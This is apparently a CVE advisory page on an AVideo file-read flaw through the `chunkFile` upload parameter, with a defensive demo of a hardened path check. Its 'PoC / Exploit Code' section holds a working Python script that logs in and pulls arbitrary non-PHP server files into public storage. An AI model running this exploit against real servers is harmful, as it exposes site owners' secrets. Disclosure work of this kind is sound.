Security Vulnerability Report
CVE-2026-33354 CVSS 7.6 HIGH

CVE-2026-33354

Published: 2026-03-23 15:16:34
Last Modified: 2026-03-24 18:57:19

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, `POST /objects/aVideoEncoder.json.php` accepts a requester-controlled `chunkFile` parameter intended for staged upload chunks. Instead of restricting that path to trusted server-generated chunk locations, the endpoint accepts arbitrary local filesystem paths that pass `isValidURLOrPath()`. That helper allows files under broad server directories including `/var/www/`, the application root, cache, tmp, and `videos`, only rejecting `.php` files. For an authenticated uploader editing their own video, this becomes an arbitrary local file read. The endpoint copies the attacker-chosen local file into the attacker's public video storage path, after which it can be downloaded over HTTP. Commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f contains a patch for the issue.
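The root cause above is a path check that allows anything under a handful of broad server directories and only denies `.php`, where the endpoint should have accepted nothing but a server-generated chunk inside its own staging directory. The following is an added example, not AVideo project code and not the real `isValidURLOrPath()`: it models that weak prefix-allowlist check next to a hardened resolver that only accepts a bare chunk name inside the staging directory, canonicalises it, and rejects traversal, absolute paths, and symlinks that escape. The function names, the directory layout, the `configuration.json` sample secret and the chunk names are all assumptions constructed for the demo.

```python
"""Added example for CVE-2026-33354 (not AVideo's code): weak path allowlist
versus a hardened chunk-path resolver. Names, paths and sample files below
are constructed for the demo, not taken from the project."""
import os
import re
import tempfile
from typing import Optional, Tuple


def weak_is_valid_path(path: str, allowed_roots: Tuple[str, ...]) -> bool:
    """Models the pattern the advisory describes: a prefix allowlist of broad
    server directories plus a '.php' denylist. Anything else under those
    roots is accepted, which is what turns chunkFile into a file read."""
    if path.lower().endswith(".php"):
        return False
    return any(path.startswith(root) for root in allowed_roots)


def hardened_resolve_chunk(chunk_name: str, chunk_dir: str) -> Optional[str]:
    """Accept only a server-generated chunk inside chunk_dir.

    The client may supply a bare chunk name, never a path: it must have no
    directory component and only safe characters. The joined path must not be
    a symlink, must canonicalise to somewhere inside chunk_dir, and must be a
    regular file. Returns the resolved path, or None on any failure."""
    chunk_root = os.path.realpath(chunk_dir)
    if chunk_name != os.path.basename(chunk_name):
        return None  # absolute path or traversal component supplied
    if not re.fullmatch(r"[A-Za-z0-9._-]+", chunk_name):
        return None
    joined = os.path.join(chunk_root, chunk_name)
    if os.path.islink(joined):
        return None  # a planted symlink must not redirect the copy
    resolved = os.path.realpath(joined)
    if os.path.commonpath([chunk_root, resolved]) != chunk_root:
        return None
    if not os.path.isfile(resolved):
        return None
    return resolved


def demo() -> dict:
    """Builds a throwaway web root (constructed sample data) and runs both
    checks against a staged chunk, a sensitive non-.php file, a traversal
    string and a symlink planted in the chunk directory."""
    with tempfile.TemporaryDirectory() as base:
        web_root = os.path.join(base, "www")                     # assumed app root
        chunk_dir = os.path.join(web_root, "videos", "cache", "chunks")  # assumed staging dir
        os.makedirs(chunk_dir)

        secret = os.path.join(web_root, "videos", "configuration.json")  # constructed secret
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write('{"db_pass": "constructed-sample-value"}')

        good_chunk = os.path.join(chunk_dir, "chunk_000001")
        with open(good_chunk, "wb") as fh:
            fh.write(b"\x00" * 16)

        symlink_result = None  # None means the platform could not create symlinks
        try:
            os.symlink(secret, os.path.join(chunk_dir, "chunk_000002"))
            symlink_result = hardened_resolve_chunk("chunk_000002", chunk_dir) is None
        except (OSError, NotImplementedError):
            pass

        allowed_roots = (web_root + os.sep,)  # the broad-directory allowlist, modelled
        return {
            "weak_accepts_secret": weak_is_valid_path(secret, allowed_roots),
            "weak_rejects_php": weak_is_valid_path(os.path.join(web_root, "index.php"), allowed_roots),
            "hardened_accepts_chunk": hardened_resolve_chunk("chunk_000001", chunk_dir)
            == os.path.realpath(good_chunk),
            "hardened_rejects_absolute": hardened_resolve_chunk(secret, chunk_dir) is None,
            "hardened_rejects_traversal": hardened_resolve_chunk("../../configuration.json", chunk_dir) is None,
            "hardened_rejects_symlink": symlink_result,
        }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The weak check accepts the JSON secret because it lives under the allowed root and is not `.php`; the hardened resolver accepts only the staged chunk and refuses the absolute path, the traversal string and the planted symlink. The same shape applies to the real fix: the server, not the requester, decides where chunks live, and the client-supplied value is at most a name looked up inside that location.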

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import requests

# PoC for CVE-2026-33354: AVideo arbitrary local file read via `chunkFile`
# on POST /objects/aVideoEncoder.json.php. Requires an authenticated,
# low-privilege uploader account.
#
# Caveat from the advisory: isValidURLOrPath() only accepts paths under
# broad server directories (/var/www/, the application root, cache, tmp,
# videos) and rejects `.php` files, so a path such as /etc/passwd is not
# expected to pass the check. Supply a non-.php file under one of those
# directories as the command-line argument.

target_host = "http://avideo.example.com"
login_url = f"{target_host}/userLogin"  # login route as assumed by this PoC
upload_url = f"{target_host}/objects/aVideoEncoder.json.php"

# Attacker credentials (low-privilege uploader)
credentials = {"user": "attacker", "pass": "password"}

if len(sys.argv) != 2:
    sys.exit("usage: poc.py </path/to/non-php/file/under/an/allowed/directory>")
target_file = sys.argv[1]

# 1. Establish an authenticated session
session = requests.Session()
login = session.post(login_url, data=credentials, timeout=15)
if login.status_code != 200:
    sys.exit(f"[-] Login failed. Status code: {login.status_code}")

# 2. Hit the vulnerable endpoint. `chunkFile` is meant to name a
#    server-generated upload chunk, but the server copies whatever local
#    file it points at into the attacker's public video storage path.
#    The `action` field is carried over from the original PoC; verify the
#    endpoint's expected parameters against the target version.
payload = {"chunkFile": target_file, "action": "save"}
response = session.post(upload_url, data=payload, timeout=30)

if response.status_code == 200:
    print("[+] Request accepted.")
    print("[+] Look for the copied file under the attacker's video storage path,")
    print("    which is served over HTTP. Response body (truncated):")
    print(response.text[:500])
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")

References

https://github.com/WWBN/AVideo/commit/59bbd601a3f65a5b18c1d9e4eb11471c0a59214f (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-4jw9-5hrc-m4j6 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33354",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T15:16:33.897",
    "lastModified": "2026-03-24T18:57:18.607",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, `POST /objects/aVideoEncoder.json.php` accepts a requester-controlled `chunkFile` parameter intended for staged upload chunks. Instead of restricting that path to trusted server-generated chunk locations, the endpoint accepts arbitrary local filesystem paths that pass `isValidURLOrPath()`. That helper allows files under broad server directories including `/var/www/`, the application root, cache, tmp, and `videos`, only rejecting `.php` files. For an authenticated uploader editing their own video, this becomes an arbitrary local file read. The endpoint copies the attacker-chosen local file into the attacker's public video storage path, after which it can be downloaded over HTTP. Commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f contains a patch for the issue."
      },
      {
        "lang": "es",
        "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, `POST /objects/aVideoEncoder.json.php` acepta un parámetro `chunkFile` controlado por el solicitante, destinado a fragmentos de carga por etapas. En lugar de restringir esa ruta a ubicaciones de fragmentos generadas por el servidor de confianza, el endpoint acepta rutas arbitrarias del sistema de archivos local que pasan `isValidURLOrPath()`. Esa función auxiliar permite archivos bajo directorios amplios del servidor, incluyendo `/var/www/`, la raíz de la aplicación, caché, tmp, y `videos`, solo rechazando archivos `.php`. Para un cargador autenticado que edita su propio video, esto se convierte en una lectura arbitraria de archivos locales. El endpoint copia el archivo local elegido por el atacante en la ruta de almacenamiento de video público del atacante, después de lo cual puede ser descargado por HTTP. El commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f contiene un parche para el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-73"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "26.0",
                "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/59bbd601a3f65a5b18c1d9e4eb11471c0a59214f",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-4jw9-5hrc-m4j6",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}